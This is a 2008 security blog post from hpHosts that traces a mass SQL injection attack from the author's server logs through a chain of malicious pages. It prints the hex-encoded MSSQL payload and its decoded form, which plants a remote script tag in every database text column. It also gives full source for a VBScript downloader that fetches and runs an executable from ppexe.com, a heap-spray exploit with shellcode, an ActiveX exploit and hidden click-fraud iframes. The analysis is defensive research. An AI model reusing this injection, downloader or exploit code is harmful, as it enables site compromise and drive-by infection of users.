Blog for hpHosts, and whatever else I feel like writing about ....

Monday 15 September 2008

Injection via Hex encoded SQL

I'm not surprised when I see injection attempts against my servers anymore, but I am surprised that they're still going with the same domain. The domain that they've used in this particular attack, is one that I saw a couple months or so ago (though I'm not surprised that the domain is still online, due to where it's hosted).

The entry in my server log for this one is;

Attacker: 116.232.98.101

2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:30:55 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0


The hex we're interested in, is the part that begins with 0x, and ends with F72 (look just before %20AS%20CHAR since %20 is just the space character). If we decode the hex, we end up with;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This tells us that it is an SQL exploit that injects the script from www0.douhunqn.cn. What does this script contain? The following of course;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 16 September 2008
Time: 02:21:49:21
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


This script is detected by AntiVir as JS/Dldr.IFrame.CR

You'll also notice that it grabs new.htm from the same domain, this is detected as HTML/IFrame.UX, and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 9
Date: 16 September 2008
Time: 02:23:51:23
*****************************************************************
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>

<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2094465.js"></script>


Oh dear, this is getting a little messy isn't it?. Lets see what this does shall we.

http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605

This is a counter that presumably, tells them how many times the script has been loaded.

http://www0.douhunqn.cn/csrss/06014.htm

This is the HTML/Rce.Gen infection, and gives us a lovely little executable called rondll32.exe (19.8KB), lovingly downloaded from ppexe.com (Ref: hpHosts Listing);

http://www.ppexe.com/csrss/rondll32.exe

It's downloaded via XMLHTTP and installed via the FileSystemObject (part of the Microsoft Scripting Runtime). For some peculiar reason, my attempts to download rondll32.exe failed (the download kept timing out).

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/06014.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 6
iFrames: 0
Date: 16 September 2008
Time: 02:31:35:31
*****************************************************************
<script language=VBScript>
On Error Resume Next
gameee = "http://www.ppexe.com/csrss/rondll32.exe"
Set gameee_2_cn = document.createElement("object")
gameeeid="clsid:"
gameeeidx="BD"
gameeeid2="96"
gameeeid3="C5"
gameeeid4="56-6"
gameeeid5="5A"
gameeeid6="3-1"
gameeeid7="1D"
gameeeid8="0-98"
gameeeid9="3A-0"
gameeeid10="0C0"
gameeeid11="4FC"
gameeeid12="29E"
gameeeid13="36"
dadong="classid"
gameee3="Micro"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee6="E"
gameee7="T"
gameee_2_cn.SetAttribute dadong, gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeid13
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="Gameeeeeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456sssx="b.stream"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovegameee.ResponseBody
</script>
<script language="JavaScript">
chilams["Savetofile"](gameee_kiteggggggggg,2);
</script>
<script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Love_gameee.run ("""&gameee_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile gameee_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
cute_qq_cn_qq_123456.ShellExeCute gameee_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


http://www0.douhunqn.cn/csrss/flash.htm

This is detected as HEUR/HTML.Malware and loads yet more iFrames;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/flash.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 2
Date: 16 September 2008
Time: 02:45:17:45
*****************************************************************
<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
var yt2="play=Yes";
var yt3="path=/";
var yt4="expires=";
var yt1=yt2+yt3+yt4;
document.cookie=yt1+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{

document.write("<iframe src=i1.html width=100 height=0></iframe>");
document.write("");
}


else{
document.write("<iframe src=f2.html width=100 height=0></iframe>");
document.write("");
}
}
</script>
</html>


i1.html, detected as JS/Dldr.Agent.CQ shows it's loading several SWF (flash) files, I've not checked these yet;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/i1.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 0
Date: 16 September 2008
Time: 02:47:38:47
*****************************************************************
<Script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "DZ";
var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</ScripT>


f2.html, detected as HS/Dldr.Agent.QI seems to do the same;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/f2.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:52:33:52
*****************************************************************
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==64){
var fuckavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==47){
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>


http://www0.douhunqn.cn/csrss/net.htm

This is a rather nice little file, that according to it's title, is a Visual Studio 0day exploit;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/net.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:54:25:54
*****************************************************************
<html>
<title>ÓêÌï Microsoft Visual Studio 0day Exploit!</title>
<script language="JavaScript">

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++)
{
buf1=buf1+unescape("%0c");
}

var Evilcutecode = unescape("%u56E8%u0000%u5300%u5655%u8B57%u246C%u8B18%u3C45%u548B" +
"%u7805%uEA01%u4A8B%u8B18%u205A%uEB01%u32E3%u8B49%u8B34" +
"%uEE01%uFF31%u31FC%uACC0%uE038%u0774%uCFC1%u010D%uEBC7" +
"%u3BF2%u247C%u7514%u8BE1%u245A%uEB01%u8B66%u4B0C%u5A8B" +
"%u011C%u8BEB%u8B04%uE801%u02EB%uC031%u5E5F%u5B5D%u08C2" +
"%u5E00%u306A%u6459%u198B%u5B8B%u8B0C%u1C5B%u1B8B%u5B8B" +
"%u5308%u8E68%u0E4E%uFFEC%u89D6%u53C7%u8E68%u0E4E%uFFEC" +
"%uEBD6%u5A50%uFF52%u89D0%u52C2%u5352%uAA68%u0DFC%uFF7C" +
"%u5AD6%u4DEB%u5159%uFF52%uEBD0%u5A72%u5BEB%u6A59%u6A00" +
"%u5100%u6A52%uFF00%u53D0%uA068%uC9D5%uFF4D%u5AD6%uFF52" +
"%u53D0%u9868%u8AFE%uFF0E%uEBD6%u5944%u006A%uFF51%u53D0" +
"%u7E68%uE2D8%uFF73%u6AD6%uFF00%uE8D0%uFFAB%uFFFF%u7275" +
"%u6D6C%u6E6F%u642E%u6C6C%uE800%uFFAE%uFFFF%u5255%u444C" +
"%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800%uFFA0" +
"%uFFFF%u2E2E%u005C%uB7E8%uFFFF%u2EFF%u5C2E%uE800%uFF89" +
"%uFFFF%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000");

var evilcuteSize = (Evilcutecode.length * 2);

var CutespraySled = unescape("%u9090"+"%u9090");

var CuteAddress = 0x0c0c0c0c;

var CuteBlockSize = 0x100000;

var spraySledSize = CuteBlockSize - (evilcuteSize + 1);

var CuteheapBlocks = (CuteAddress+CuteBlockSize)/CuteBlockSize;

var x = new window["Array"]();

while (CutespraySled.length*2<spraySledSize)
{
CutespraySled += CutespraySled;
}

CutespraySled = CutespraySled.substring(0,spraySledSize/2);

for (i=0;i<CuteheapBlocks;i++)
{
x[i] = CutespraySled + Evilcutecode;
}

document.write(body+buf1+body1);

</script>
</html>


Malzilla had this to say about the u% escaped code;



http://www0.douhunqn.cn/csrss/ff.htm

Alas they really want you to have the executable from ppexe.com, as shown by the following, detected as EXP/SnapshotViewe.B

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/ff.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:00:02:00
*****************************************************************
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var yt1="snpvw.Snapshot Viewer Control.1";
var objlcx = new ActiveXObject(yt1);

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.ppexe.com/csrss/rondll32.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>


http://www0.douhunqn.cn/csrss/tr.htm

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/tr.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 4
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:03:17:03
*****************************************************************
<iframe src=http://www.lukclick.com/search/51777.htm width=100 height=0></iframe>
<iframe src=http://www.letusearch.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.onegameplace.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.kkexe.com/key.htm width=100 height=0></iframe>


Yeesh!, they really want to give us as much as possible don't they?

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.lukclick.com/search/51777.htm

Server IP: 208.53.147.195 [ . ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 2

iFrames: 7

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:05:58:05

*****************************************************************

<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> ads </title>
</head>

<body>


<IFRAME src=http://www.afeisearch.com/portal.php?r=0&username=awei width=0 height=0></IFRAME>

<iframe src="http://www.u2clicks.com/portal.php?r=0&username=jiajia" width="0" height="0" name="cpm"></iframe>

<iframe src="http://www.values7.com/banners/view_ad.php?username=mhv88&format=1" style="border:none" name="advertising" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="31" width="88"></iframe>

<IFRAME src="http://www.kikclicks.com/engine/?ref=beibei" width=1 height=1></IFRAME>

<iframe width="0" height="0" src="http://www.lukclick.com/search/luckymouse.htm"></iframe>

<iframe width="0" height="0" src="http://www.lukclick.com/search/18889.htm"></iframe>

<iframe width=468 height=60 src='http://www.advpoints.com/promote15.php?uid=8918' frameborder=0 marginwidth=0 marginheight=0 vspace=1 hspace=1 allowtransparency=true scrolling=no></iframe>

</body>

<script src='http://goako.com/accounts_js_feed_wizard_display_results.php?idUser=3&username=test&keywords=work at home&adult_filter=off&results_number=10&results_display_style=vertical'></script>

<script src='http://s90.cnzz.com/stat.php?id=1033093&web_id=1033093&online=1&show=line' language='JavaScript' charset='gb2312'></script>

</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.letusearch.com/xiaoke.htm
Server IP: 74.52.24.59 [ mail.wtowww.com ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:10:10:10
*****************************************************************
<iframe src=http://www.letusearch.com/search/d.php?aff=xiaoke width=0 height=0></iframe>


*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.onegameplace.com/xiaoke.htm

Server IP: 65.110.63.170 [ 65-110-63-170.static.sagonet.net ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 4

iFrames: 1

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:11:24:11

*****************************************************************

<HTML>
<HEAD><TITLE>OneGameplace</TITLE>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
</HEAD>
<BODY>
<iframe src=http://www.7scv.com/search/portal.php?username=xiaoke width='0' height='0' frameborder='0'></iframe>
<A href="http://www.51-search.com/search.php?query=Free+Games" target=_blank>Free Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Flash+Games" target=_blank>Flash Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Arcade+Games" target=_blank>Arcade Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Play+Online" target=_blank>Play Online</A> </LI></UL>
<H3><A
href="http://www.51-search.com/search.php?query=Free+Online+Games" target=_blank>Free Online Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Addicting+Games" target=_blank>Addicting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Free+Fun" target=_blank>Free Fun</A>
<LI><A href="http://www.51-search.com/search.php?query=Sports+Games" target=_blank>Sports Games</A> </LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Action+Games" target=_blank>Action Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Adventure+Games" target=_blank>Adventure Games</A>

<LI><A href="http://www.51-search.com/search.php?query=Puzzle+Games" target=_blank>Puzzle Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Skills+Games" target=_blank>Skills Games</A>
</LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Shooting+Games" target=_blank>Shooting Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Fighting+Games" target=_blank>Fighting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Work+at+Home" target=_blank>Work at Home</A>
<LI><A href="http://www.51-search.com/search.php?query=RPG+Games" target=_blank>RPG Games</A> </LI></UL></DIV><!-- dir left end --><!-- dir mid box -->

<DIV id=FT>© 2007-2008 OneGamePlace
</DIV>
</DIV><!-- footer end --></DIV></DIV></DIV></DIV><!-- main container end -->
<table border = "0">
<tr>

<td>

</td>


</tr>
</table>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=kkology">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
